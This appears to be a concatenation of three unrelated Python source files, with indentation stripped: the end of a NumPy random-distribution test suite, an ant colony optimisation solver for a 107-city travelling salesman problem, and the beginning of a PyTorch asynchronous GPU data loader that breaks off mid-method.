assert_raises(OverflowError, func, [0], [np.inf])
# (fmax / 1e17) - fmin is within range, so this should not throw
# account for i386 extended precision DBL_MAX / 1e17 + DBL_MAX >
# DBL_MAX by increasing fmin a bit
random.uniform(low=np.nextafter(fmin, 1), high=fmax / 1e17)
def test_scalar_exception_propagation(self):
# Tests that exceptions are correctly propagated in distributions
# when called with objects that throw exceptions when converted to
# scalars.
#
# Regression test for gh: 8865
class ThrowingFloat(np.ndarray):
def __float__(self):
raise TypeError
throwing_float = np.array(1.0).view(ThrowingFloat)
assert_raises(TypeError, random.uniform, throwing_float,
throwing_float)
class ThrowingInteger(np.ndarray):
def __int__(self):
raise TypeError
throwing_int = np.array(1).view(ThrowingInteger)
assert_raises(TypeError, random.hypergeometric, throwing_int, 1, 1)
def test_vonmises(self):
random.seed(self.seed)
actual = random.vonmises(mu=1.23, kappa=1.54, size=(3, 2))
desired = np.array([[2.28567572673902042, 2.89163838442285037],
[0.38198375564286025, 2.57638023113890746],
[1.19153771588353052, 1.83509849681825354]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_vonmises_small(self):
# check infinite loop, gh-4720
random.seed(self.seed)
r = random.vonmises(mu=0., kappa=1.1e-8, size=10**6)
assert_(np.isfinite(r).all())
def test_vonmises_nan(self):
random.seed(self.seed)
r = random.vonmises(mu=0., kappa=np.nan)
assert_(np.isnan(r))
def test_wald(self):
random.seed(self.seed)
actual = random.wald(mean=1.23, scale=1.54, size=(3, 2))
desired = np.array([[3.82935265715889983, 5.13125249184285526],
[0.35045403618358717, 1.50832396872003538],
[0.24124319895843183, 0.22031101461955038]])
assert_array_almost_equal(actual, desired, decimal=14)
def test_weibull(self):
random.seed(self.seed)
actual = random.weibull(a=1.23, size=(3, 2))
desired = np.array([[0.97097342648766727, 0.91422896443565516],
[1.89517770034962929, 1.91414357960479564],
[0.67057783752390987, 1.39494046635066793]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_weibull_0(self):
random.seed(self.seed)
assert_equal(random.weibull(a=0, size=12), np.zeros(12))
assert_raises(ValueError, random.weibull, a=-0.)
def test_zipf(self):
random.seed(self.seed)
actual = random.zipf(a=1.23, size=(3, 2))
desired = np.array([[66, 29],
[1, 1],
[3, 13]])
assert_array_equal(actual, desired)
class TestBroadcast:
# tests that functions that broadcast behave
# correctly when presented with non-scalar arguments
def setup(self):
self.seed = 123456789
def set_seed(self):
random.seed(self.seed)
def test_uniform(self):
low = [0]
high = [1]
uniform = random.uniform
desired = np.array([0.53283302478975902,
0.53413660089041659,
0.50955303552646702])
self.set_seed()
actual = uniform(low * 3, high)
assert_array_almost_equal(actual, desired, decimal=14)
self.set_seed()
actual = uniform(low, high * 3)
assert_array_almost_equal(actual, desired, decimal=14)
def test_normal(self):
loc = [0]
scale = [1]
bad_scale = [-1]
normal = random.normal
desired = np.array([2.2129019979039612,
2.1283977976520019,
1.8417114045748335])
self.set_seed()
actual = normal(loc * 3, scale)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, normal, loc * 3, bad_scale)
self.set_seed()
actual = normal(loc, scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, normal, loc, bad_scale * 3)
def test_beta(self):
a = [1]
b = [2]
bad_a = [-1]
bad_b = [-2]
beta = random.beta
desired = np.array([0.19843558305989056,
0.075230336409423643,
0.24976865978980844])
self.set_seed()
actual = beta(a * 3, b)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, beta, bad_a * 3, b)
assert_raises(ValueError, beta, a * 3, bad_b)
self.set_seed()
actual = beta(a, b * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, beta, bad_a, b * 3)
assert_raises(ValueError, beta, a, bad_b * 3)
def test_exponential(self):
scale = [1]
bad_scale = [-1]
exponential = random.exponential
desired = np.array([0.76106853658845242,
0.76386282278691653,
0.71243813125891797])
self.set_seed()
actual = exponential(scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, exponential, bad_scale * 3)
def test_standard_gamma(self):
shape = [1]
bad_shape = [-1]
std_gamma = random.standard_gamma
desired = np.array([0.76106853658845242,
0.76386282278691653,
0.71243813125891797])
self.set_seed()
actual = std_gamma(shape * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, std_gamma, bad_shape * 3)
def test_gamma(self):
shape = [1]
scale = [2]
bad_shape = [-1]
bad_scale = [-2]
gamma = random.gamma
desired = np.array([1.5221370731769048,
1.5277256455738331,
1.4248762625178359])
self.set_seed()
actual = gamma(shape * 3, scale)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, gamma, bad_shape * 3, scale)
assert_raises(ValueError, gamma, shape * 3, bad_scale)
self.set_seed()
actual = gamma(shape, scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, gamma, bad_shape, scale * 3)
assert_raises(ValueError, gamma, shape, bad_scale * 3)
def test_f(self):
dfnum = [1]
dfden = [2]
bad_dfnum = [-1]
bad_dfden = [-2]
f = random.f
desired = np.array([0.80038951638264799,
0.86768719635363512,
2.7251095168386801])
self.set_seed()
actual = f(dfnum * 3, dfden)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, f, bad_dfnum * 3, dfden)
assert_raises(ValueError, f, dfnum * 3, bad_dfden)
self.set_seed()
actual = f(dfnum, dfden * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, f, bad_dfnum, dfden * 3)
assert_raises(ValueError, f, dfnum, bad_dfden * 3)
def test_noncentral_f(self):
dfnum = [2]
dfden = [3]
nonc = [4]
bad_dfnum = [0]
bad_dfden = [-1]
bad_nonc = [-2]
nonc_f = random.noncentral_f
desired = np.array([9.1393943263705211,
13.025456344595602,
8.8018098359100545])
self.set_seed()
actual = nonc_f(dfnum * 3, dfden, nonc)
assert_array_almost_equal(actual, desired, decimal=14)
assert np.all(np.isnan(nonc_f(dfnum, dfden, [np.nan] * 3)))
assert_raises(ValueError, nonc_f, bad_dfnum * 3, dfden, nonc)
assert_raises(ValueError, nonc_f, dfnum * 3, bad_dfden, nonc)
assert_raises(ValueError, nonc_f, dfnum * 3, dfden, bad_nonc)
self.set_seed()
actual = nonc_f(dfnum, dfden * 3, nonc)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, nonc_f, bad_dfnum, dfden * 3, nonc)
assert_raises(ValueError, nonc_f, dfnum, bad_dfden * 3, nonc)
assert_raises(ValueError, nonc_f, dfnum, dfden * 3, bad_nonc)
self.set_seed()
actual = nonc_f(dfnum, dfden, nonc * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, nonc_f, bad_dfnum, dfden, nonc * 3)
assert_raises(ValueError, nonc_f, dfnum, bad_dfden, nonc * 3)
assert_raises(ValueError, nonc_f, dfnum, dfden, bad_nonc * 3)
def test_noncentral_f_small_df(self):
self.set_seed()
desired = np.array([6.869638627492048, 0.785880199263955])
actual = random.noncentral_f(0.9, 0.9, 2, size=2)
assert_array_almost_equal(actual, desired, decimal=14)
def test_chisquare(self):
df = [1]
bad_df = [-1]
chisquare = random.chisquare
desired = np.array([0.57022801133088286,
0.51947702108840776,
0.1320969254923558])
self.set_seed()
actual = chisquare(df * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, chisquare, bad_df * 3)
def test_noncentral_chisquare(self):
df = [1]
nonc = [2]
bad_df = [-1]
bad_nonc = [-2]
nonc_chi = random.noncentral_chisquare
desired = np.array([9.0015599467913763,
4.5804135049718742,
6.0872302432834564])
self.set_seed()
actual = nonc_chi(df * 3, nonc)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, nonc_chi, bad_df * 3, nonc)
assert_raises(ValueError, nonc_chi, df * 3, bad_nonc)
self.set_seed()
actual = nonc_chi(df, nonc * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, nonc_chi, bad_df, nonc * 3)
assert_raises(ValueError, nonc_chi, df, bad_nonc * 3)
def test_standard_t(self):
df = [1]
bad_df = [-1]
t = random.standard_t
desired = np.array([3.0702872575217643,
5.8560725167361607,
1.0274791436474273])
self.set_seed()
actual = t(df * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, t, bad_df * 3)
assert_raises(ValueError, random.standard_t, bad_df * 3)
def test_vonmises(self):
mu = [2]
kappa = [1]
bad_kappa = [-1]
vonmises = random.vonmises
desired = np.array([2.9883443664201312,
-2.7064099483995943,
-1.8672476700665914])
self.set_seed()
actual = vonmises(mu * 3, kappa)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, vonmises, mu * 3, bad_kappa)
self.set_seed()
actual = vonmises(mu, kappa * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, vonmises, mu, bad_kappa * 3)
def test_pareto(self):
a = [1]
bad_a = [-1]
pareto = random.pareto
desired = np.array([1.1405622680198362,
1.1465519762044529,
1.0389564467453547])
self.set_seed()
actual = pareto(a * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, pareto, bad_a * 3)
assert_raises(ValueError, random.pareto, bad_a * 3)
def test_weibull(self):
a = [1]
bad_a = [-1]
weibull = random.weibull
desired = np.array([0.76106853658845242,
0.76386282278691653,
0.71243813125891797])
self.set_seed()
actual = weibull(a * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, weibull, bad_a * 3)
assert_raises(ValueError, random.weibull, bad_a * 3)
def test_power(self):
a = [1]
bad_a = [-1]
power = random.power
desired = np.array([0.53283302478975902,
0.53413660089041659,
0.50955303552646702])
self.set_seed()
actual = power(a * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, power, bad_a * 3)
assert_raises(ValueError, random.power, bad_a * 3)
def test_laplace(self):
loc = [0]
scale = [1]
bad_scale = [-1]
laplace = random.laplace
desired = np.array([0.067921356028507157,
0.070715642226971326,
0.019290950698972624])
self.set_seed()
actual = laplace(loc * 3, scale)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, laplace, loc * 3, bad_scale)
self.set_seed()
actual = laplace(loc, scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, laplace, loc, bad_scale * 3)
def test_gumbel(self):
loc = [0]
scale = [1]
bad_scale = [-1]
gumbel = random.gumbel
desired = np.array([0.2730318639556768,
0.26936705726291116,
0.33906220393037939])
self.set_seed()
actual = gumbel(loc * 3, scale)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, gumbel, loc * 3, bad_scale)
self.set_seed()
actual = gumbel(loc, scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, gumbel, loc, bad_scale * 3)
def test_logistic(self):
loc = [0]
scale = [1]
bad_scale = [-1]
logistic = random.logistic
desired = np.array([0.13152135837586171,
0.13675915696285773,
0.038216792802833396])
self.set_seed()
actual = logistic(loc * 3, scale)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, logistic, loc * 3, bad_scale)
self.set_seed()
actual = logistic(loc, scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, logistic, loc, bad_scale * 3)
assert_equal(random.logistic(1.0, 0.0), 1.0)
def test_lognormal(self):
mean = [0]
sigma = [1]
bad_sigma = [-1]
lognormal = random.lognormal
desired = np.array([9.1422086044848427,
8.4013952870126261,
6.3073234116578671])
self.set_seed()
actual = lognormal(mean * 3, sigma)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, lognormal, mean * 3, bad_sigma)
assert_raises(ValueError, random.lognormal, mean * 3, bad_sigma)
self.set_seed()
actual = lognormal(mean, sigma * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, lognormal, mean, bad_sigma * 3)
assert_raises(ValueError, random.lognormal, mean, bad_sigma * 3)
def test_rayleigh(self):
scale = [1]
bad_scale = [-1]
rayleigh = random.rayleigh
desired = np.array([1.2337491937897689,
1.2360119924878694,
1.1936818095781789])
self.set_seed()
actual = rayleigh(scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, rayleigh, bad_scale * 3)
def test_wald(self):
mean = [0.5]
scale = [1]
bad_mean = [0]
bad_scale = [-2]
wald = random.wald
desired = np.array([0.11873681120271318,
0.12450084820795027,
0.9096122728408238])
self.set_seed()
actual = wald(mean * 3, scale)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, wald, bad_mean * 3, scale)
assert_raises(ValueError, wald, mean * 3, bad_scale)
assert_raises(ValueError, random.wald, bad_mean * 3, scale)
assert_raises(ValueError, random.wald, mean * 3, bad_scale)
self.set_seed()
actual = wald(mean, scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, wald, bad_mean, scale * 3)
assert_raises(ValueError, wald, mean, bad_scale * 3)
assert_raises(ValueError, wald, 0.0, 1)
assert_raises(ValueError, wald, 0.5, 0.0)
def test_triangular(self):
left = [1]
right = [3]
mode = [2]
bad_left_one = [3]
bad_mode_one = [4]
bad_left_two, bad_mode_two = right * 2
triangular = random.triangular
desired = np.array([2.03339048710429,
2.0347400359389356,
2.0095991069536208])
self.set_seed()
actual = triangular(left * 3, mode, right)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, triangular, bad_left_one * 3, mode, right)
assert_raises(ValueError, triangular, left * 3, bad_mode_one, right)
assert_raises(ValueError, triangular, bad_left_two * 3, bad_mode_two,
right)
self.set_seed()
actual = triangular(left, mode * 3, right)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, triangular, bad_left_one, mode * 3, right)
assert_raises(ValueError, triangular, left, bad_mode_one * 3, right)
assert_raises(ValueError, triangular, bad_left_two, bad_mode_two * 3,
right)
self.set_seed()
actual = triangular(left, mode, right * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, triangular, bad_left_one, mode, right * 3)
assert_raises(ValueError, triangular, left, bad_mode_one, right * 3)
assert_raises(ValueError, triangular, bad_left_two, bad_mode_two,
right * 3)
assert_raises(ValueError, triangular, 10., 0., 20.)
assert_raises(ValueError, triangular, 10., 25., 20.)
assert_raises(ValueError, triangular, 10., 10., 10.)
def test_binomial(self):
n = [1]
p = [0.5]
bad_n = [-1]
bad_p_one = [-1]
bad_p_two = [1.5]
binom = random.binomial
desired = np.array([1, 1, 1])
self.set_seed()
actual = binom(n * 3, p)
assert_array_equal(actual, desired)
assert_raises(ValueError, binom, bad_n * 3, p)
assert_raises(ValueError, binom, n * 3, bad_p_one)
assert_raises(ValueError, binom, n * 3, bad_p_two)
self.set_seed()
actual = binom(n, p * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, binom, bad_n, p * 3)
assert_raises(ValueError, binom, n, bad_p_one * 3)
assert_raises(ValueError, binom, n, bad_p_two * 3)
def test_negative_binomial(self):
n = [1]
p = [0.5]
bad_n = [-1]
bad_p_one = [-1]
bad_p_two = [1.5]
neg_binom = random.negative_binomial
desired = np.array([1, 0, 1])
self.set_seed()
actual = neg_binom(n * 3, p)
assert_array_equal(actual, desired)
assert_raises(ValueError, neg_binom, bad_n * 3, p)
assert_raises(ValueError, neg_binom, n * 3, bad_p_one)
assert_raises(ValueError, neg_binom, n * 3, bad_p_two)
self.set_seed()
actual = neg_binom(n, p * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, neg_binom, bad_n, p * 3)
assert_raises(ValueError, neg_binom, n, bad_p_one * 3)
assert_raises(ValueError, neg_binom, n, bad_p_two * 3)
def test_poisson(self):
max_lam = random.RandomState()._poisson_lam_max
lam = [1]
bad_lam_one = [-1]
bad_lam_two = [max_lam * 2]
poisson = random.poisson
desired = np.array([1, 1, 0])
self.set_seed()
actual = poisson(lam * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, poisson, bad_lam_one * 3)
assert_raises(ValueError, poisson, bad_lam_two * 3)
def test_zipf(self):
a = [2]
bad_a = [0]
zipf = random.zipf
desired = np.array([2, 2, 1])
self.set_seed()
actual = zipf(a * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, zipf, bad_a * 3)
with np.errstate(invalid='ignore'):
assert_raises(ValueError, zipf, np.nan)
assert_raises(ValueError, zipf, [0, 0, np.nan])
def test_geometric(self):
p = [0.5]
bad_p_one = [-1]
bad_p_two = [1.5]
geom = random.geometric
desired = np.array([2, 2, 2])
self.set_seed()
actual = geom(p * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, geom, bad_p_one * 3)
assert_raises(ValueError, geom, bad_p_two * 3)
def test_hypergeometric(self):
ngood = [1]
nbad = [2]
nsample = [2]
bad_ngood = [-1]
bad_nbad = [-2]
bad_nsample_one = [0]
bad_nsample_two = [4]
hypergeom = random.hypergeometric
desired = np.array([1, 1, 1])
self.set_seed()
actual = hypergeom(ngood * 3, nbad, nsample)
assert_array_equal(actual, desired)
assert_raises(ValueError, hypergeom, bad_ngood * 3, nbad, nsample)
assert_raises(ValueError, hypergeom, ngood * 3, bad_nbad, nsample)
assert_raises(ValueError, hypergeom, ngood * 3, nbad, bad_nsample_one)
assert_raises(ValueError, hypergeom, ngood * 3, nbad, bad_nsample_two)
self.set_seed()
actual = hypergeom(ngood, nbad * 3, nsample)
assert_array_equal(actual, desired)
assert_raises(ValueError, hypergeom, bad_ngood, nbad * 3, nsample)
assert_raises(ValueError, hypergeom, ngood, bad_nbad * 3, nsample)
assert_raises(ValueError, hypergeom, ngood, nbad * 3, bad_nsample_one)
assert_raises(ValueError, hypergeom, ngood, nbad * 3, bad_nsample_two)
self.set_seed()
actual = hypergeom(ngood, nbad, nsample * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, hypergeom, bad_ngood, nbad, nsample * 3)
assert_raises(ValueError, hypergeom, ngood, bad_nbad, nsample * 3)
assert_raises(ValueError, hypergeom, ngood, nbad, bad_nsample_one * 3)
assert_raises(ValueError, hypergeom, ngood, nbad, bad_nsample_two * 3)
assert_raises(ValueError, hypergeom, -1, 10, 20)
assert_raises(ValueError, hypergeom, 10, -1, 20)
assert_raises(ValueError, hypergeom, 10, 10, 0)
assert_raises(ValueError, hypergeom, 10, 10, 25)
def test_logseries(self):
p = [0.5]
bad_p_one = [2]
bad_p_two = [-1]
logseries = random.logseries
desired = np.array([1, 1, 1])
self.set_seed()
actual = logseries(p * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, logseries, bad_p_one * 3)
assert_raises(ValueError, logseries, bad_p_two * 3)
class TestThread:
# make sure each state produces the same sequence even in threads
def setup(self):
self.seeds = range(4)
def check_function(self, function, sz):
from threading import Thread
out1 = np.empty((len(self.seeds),) + sz)
out2 = np.empty((len(self.seeds),) + sz)
# threaded generation
t = [Thread(target=function, args=(random.RandomState(s), o))
for s, o in zip(self.seeds, out1)]
[x.start() for x in t]
[x.join() for x in t]
# the same serial
for s, o in zip(self.seeds, out2):
function(random.RandomState(s), o)
# these platforms change x87 fpu precision mode in threads
if np.intp().dtype.itemsize == 4 and sys.platform == "win32":
assert_array_almost_equal(out1, out2)
else:
assert_array_equal(out1, out2)
def test_normal(self):
def gen_random(state, out):
out[...] = state.normal(size=10000)
self.check_function(gen_random, sz=(10000,))
def test_exp(self):
def gen_random(state, out):
out[...] = state.exponential(scale=np.ones((100, 1000)))
self.check_function(gen_random, sz=(100, 1000))
def test_multinomial(self):
def gen_random(state, out):
out[...] = state.multinomial(10, [1 / 6.] * 6, size=10000)
self.check_function(gen_random, sz=(10000, 6))
# See Issue #4263
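# Single-element array arguments should produce a length-1 output array (shape (1,)),
# not a scalar.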
class TestSingleEltArrayInput:
def setup(self):
self.argOne = np.array([2])
self.argTwo = np.array([3])
self.argThree = np.array([4])
self.tgtShape = (1,)
def test_one_arg_funcs(self):
funcs = (random.exponential, random.standard_gamma,
random.chisquare, random.standard_t,
random.pareto, random.weibull,
random.power, random.rayleigh,
random.poisson, random.zipf,
random.geometric, random.logseries)
probfuncs = (random.geometric, random.logseries)
for func in funcs:
if func in probfuncs: # p < 1.0
out = func(np.array([0.5]))
else:
out = func(self.argOne)
assert_equal(out.shape, self.tgtShape)
def test_two_arg_funcs(self):
funcs = (random.uniform, random.normal,
random.beta, random.gamma,
random.f, random.noncentral_chisquare,
random.vonmises, random.laplace,
random.gumbel, random.logistic,
random.lognormal, random.wald,
random.binomial, random.negative_binomial)
probfuncs = (random.binomial, random.negative_binomial)
for func in funcs:
if func in probfuncs: # p <= 1
argTwo = np.array([0.5])
else:
argTwo = self.argTwo
out = func(self.argOne, argTwo)
assert_equal(out.shape, self.tgtShape)
out = func(self.argOne[0], argTwo)
assert_equal(out.shape, self.tgtShape)
out = func(self.argOne, argTwo[0])
assert_equal(out.shape, self.tgtShape)
def test_three_arg_funcs(self):
funcs = [random.noncentral_f, random.triangular,
random.hypergeometric]
for func in funcs:
out = func(self.argOne, self.argTwo, self.argThree)
assert_equal(out.shape, self.tgtShape)
out = func(self.argOne[0], self.argTwo, self.argThree)
assert_equal(out.shape, self.tgtShape)
out = func(self.argOne, self.argTwo[0], self.argThree)
assert_equal(out.shape, self.tgtShape)
# Ensure returned array dtype is correct for platform
def test_integer_dtype(int_func):
random.seed(123456789)
fname, args, md5 = int_func
f = getattr(random, fname)
actual = f(*args, size=2)
assert_(actual.dtype == np.dtype('l'))
def test_integer_repeat(int_func):
random.seed(123456789)
fname, args, md5 = int_func
f = getattr(random, fname)
val = f(*args, size=1000000)
if sys.byteorder != 'little':
val = val.byteswap()
res = hashlib.md5(val.view(np.int8)).hexdigest()
assert_(res == md5)
def test_broadcast_size_error():
# GH-16833
with pytest.raises(ValueError):
random.binomial(1, [0.3, 0.7], size=(2, 1))
with pytest.raises(ValueError):
random.binomial([1, 2], 0.3, size=(2, 1))
with pytest.raises(ValueError):
random.binomial([1, 2], [0.3, 0.7], size=(2, 1))
|
aco.py
|
#!/usr/bin/env python3
#-*-coding:utf-8-*-
# Ant colony optimization (ACO) for the TSP
import numpy as np
import matplotlib.pyplot as plt
from copy import deepcopy as dcp
from collections import deque
import random as rd
import profile
import multiprocessing as mtp
fig_num = 0
class Ant:
"""
    Ant class: supports setting a start city, per-tour reset, and path cost calculation
"""
def __init__(self, city, Q = 10):
self.now_pos = 0
self.start = 0
self.path = []
self.plausible = {i for i in range(city)}
self.last_cost = 0
        self.Q = Q  # pheromone deposit factor
self.city = city
def initialize(self, pos_num):
self.now_pos = rd.choice(range(pos_num))
self.plausible.remove(self.now_pos)
self.path.append(self.now_pos)
self.start = self.now_pos
def updatePos(self, pos):
self.now_pos = pos
self.path.append(pos)
self.plausible.remove(pos)
def reset(self):
self.plausible = {i for i in range(self.city)}
self.plausible.remove(self.start)
self.path = [self.now_pos]
self.now_pos = self.start
self.last_cost = 0
def calculate(self, adjs:np.array):
for i in range(self.city):
self.last_cost += adjs[self.path[i]][self.path[(i + 1) % self.city]]
return self.last_cost, self.path
    # deposit pheromone onto the pheromone matrix
def secrete(self, ph_mat):
length = len(self.path)
for i in range(length):
ph_mat[self.path[i]][self.path[(i + 1) % length]] = self.Q / self.last_cost
def back2Start(self):
self.now_pos = self.start
self.path.append(self.start)
class BasicACO:
fig_num = 0
def __init__(self, city = 107, ants = 60, max_iter = 500, init = None):
        self.a = 1.0  # pheromone importance factor (larger -> less randomness)
        self.b = 4  # heuristic (expectation) importance factor (larger -> more likely to converge to a local optimum)
        self.p = 0.6  # pheromone evaporation factor
self.ant_num = ants
self.city = city
self.adjs = np.fromfile(".\\odom.bin")
self.adjs = self.adjs.reshape((city, city))
self.ants = [Ant(city) for i in range(ants)]
        self.phm = np.ones((city, city)) / 100  # pheromone matrix
self.max_iter = max_iter
self.shortest = []
self.cost = float("inf")
self.costs = []
for i in range(ants):
self.ants[i].initialize(city)
self.prefix = self.adjs ** ( - self.b)
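        # prefix is the heuristic "visibility" term (distance ** -b); each iteration it is
        # combined with the pheromone matrix as probs = phm ** a * prefix, giving the
        # unnormalised edge-selection weights sampled in choiceForAnt / randomWander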
self.probs = np.zeros_like(self.prefix)
        if init is not None:
for i in range(len(init) - 1):
self.phm[init[i]][init[i + 1]] += 1.5
    # Given an ant's index, return the list of feasible next cities and,
    # for each candidate, the (unnormalised) probability of choosing it
def choiceForAnt(self, index):
ant = self.ants[index]
pos = ant.now_pos
pl = list(self.ants[index].plausible)
        # a list comprehension here profiled very poorly
prob = self.probs[pos][pl]
return pl, list(prob)
    # Pheromone evaporation and deposit are only applied after every ant has completed a full tour
def updateSecretion(self):
        self.phm *= self.p  # evaporation
for i in range(self.ant_num):
self.ants[i].secrete(self.phm)
    # Have all ants perform one full tour
def randomWander(self, fnum):
        for _it in range(self.max_iter):  # outermost loop (number of tours)
self.probs = (self.phm ** self.a) * self.prefix
            for k in range(self.city):  # tour-construction steps
                for i in range(self.ant_num):  # loop over every ant
if k == self.city - 1:
self.ants[i].back2Start()
cost, path = self.ants[i].calculate(self.adjs)
if cost < self.cost:
self.cost = cost
self.shortest = dcp(path)
else:
pos, choice_vec = self.choiceForAnt(i)
# print(pos, choice_vec)
next_pos = rd.choices(pos, choice_vec, k = 1)[0]
self.ants[i].updatePos(next_pos)
self.costs.append(self.cost)
self.updateSecretion()
for i in range(self.ant_num):
self.ants[i].reset()
print("Iter %d / %d"%(_it, self.max_iter))
self.shortest = self.exchange(self.shortest)
print("Result(%d):"%(fnum), self.shortest)
        print("Random wander (%d ants) for %d iterations completed." % (self.ant_num, self.max_iter))
self.draw(fnum)
def optimize(self, arr:list):
result = dcp(arr)
result.pop()
result = self.exchange(result)
temp = deque(result)
temp.rotate(int(self.city / 2))
result = list(temp)
result = self.exchange(result)
        # close the path into a cycle
result.append(result[0])
return result
def exchange(self, result):
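        # 2-opt style local improvement: when replacing edges (x1, x2) and (y1, y2) by
        # (x1, y1) and (x2, y2) shortens the tour, swap the endpoints and reverse the
        # intermediate segment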
        length = len(result)
for i in range(length - 3):
for j in range(i + 2, length - 1):
                # the case where a swap is needed
x1 = result[i]
x2 = result[(i + 1) % length]
y1 = result[j % length]
y2 = result[(j + 1) % length]
if self.adjs[x1][x2] + self.adjs[y1][y2] > self.adjs[x1][y1] + self.adjs[x2][y2]:
result[(i + 1) % length], result[j % length] = result[j % length], result[(i + 1) % length]
result[(i + 2) % length:j % length] = result[(j - 1) % length : (i + 1) % length: -1]
return result
def draw(self, fnum):
        plt.rcParams['font.sans-serif'] = ['SimHei']  # set the default font
plt.rcParams['axes.unicode_minus'] = False
plt.rcParams['font.size'] = 16
_x = np.arange(len(self.costs))
plt.figure(fnum)
plt.plot(_x, self.costs, color = "black")
plt.grid()
        plt.xlabel("Number of colony tours")
        plt.ylabel("Shortest path length")
        plt.title("ACO iteration progress")
plt.savefig(".\\fig%d.png"%(fnum))
print("Final cost: %f"%(self.costs[-1]))
# plt.show()
if __name__ == "__main__":
# aco = BasicACO(107, max_iter = 200, ants = 500)
# aco.randomWander()
# profile.run("aco.randomWander()")
# aco.draw()
order = ([47, 46, 51, 64, 63, 54, 55, 87, 56, 83, 86, 88, 84, 85, 77, 78, 79, 80, 81, 82, 59, 58, 57, 53, 60, 61, 62, 65, 16, 14, 13, 15, 31, 32, 39, 38, 36, 37, 35, 33, 34, 40, 41, 106, 29, 30, 11, 10, 26, 22, 23, 21, 20, 25, 24, 18, 17, 19, 28, 27, 75, 71, 73, 72, 67, 66, 68, 69, 76, 92, 91, 90, 70, 74, 93, 94, 96, 95, 89, 98, 97, 104, 105, 8, 5, 1, 0, 2, 4, 3, 9, 103, 102, 101, 99, 100, 44, 52, 43, 42, 7, 12, 6, 50, 48, 49, 45, 47])
aco_pool = [BasicACO(107, max_iter = 64, ants = 128, init = order) for i in range(4)]
proc_pool = []
for i in range(3):
pr = mtp.Process(target = aco_pool[i].randomWander, args = (fig_num, ))
fig_num += 1
pr.start()
proc_pool.append(pr)
aco_pool[3].randomWander(3)
|
async_dataloader.py
|
import collections.abc as container_abcs
import re
from queue import Queue
from threading import Thread
from typing import Any, Optional, Union
import torch
from torch._six import string_classes
from torch.utils.data import DataLoader, Dataset
class AsynchronousLoader(object):
"""
Class for asynchronously loading from CPU memory to device memory with DataLoader.
    Note that this only works for single-GPU training; multi-GPU training uses PyTorch's DataParallel
    or DistributedDataParallel, which have their own code for transferring data across GPUs, so this
    loader could break or slow things down with them.
Args:
data: The PyTorch Dataset or DataLoader we're using to load.
device: The PyTorch device we are loading to
q_size: Size of the queue used to store the data loaded to the device
num_batches: Number of batches to load. This must be set if the dataloader
doesn't have a finite __len__. It will also override DataLoader.__len__
if set and DataLoader has a __len__. Otherwise it can be left as None
**kwargs: Any additional arguments to pass to the dataloader if we're
constructing one here
"""
def __init__(
self,
data: Union[DataLoader, Dataset],
device: torch.device = torch.device('cuda', 0),
q_size: int = 10,
num_batches: Optional[int] = None,
**kwargs: Any,
) -> None:
if isinstance(data, torch.utils.data.DataLoader):
self.dataloader = data
else:
self.dataloader = DataLoader(data, **kwargs)
if num_batches is not None:
self.num_batches = num_batches
elif hasattr(self.dataloader, '__len__'):
self.num_batches = len(self.dataloader)
else:
raise Exception("num_batches must be specified or data must have finite __len__")
self.device = device
self.q_size = q_size
self.load_stream = torch.cuda.Stream(device=device)
self.queue: Queue = Queue(maxsize=self.q_size)
self.idx = 0
self.np_str_obj_array_pattern = re.compile(r'[SaUO]')
def load_loop(self) -> None: # The loop that will load into the queue in the background
for i, sample in enumerate(self.dataloader):
self.queue.put(self.load_instance(sample))
if i == len(self):
break
# Recursive loading for each instance based on torch.utils.data.default_collate
def load_instance(self, sample: Any) -> Any:
elem_type = type(sample)
if torch.is_tensor(sample):
with torch.cuda.stream(self.load_stream):
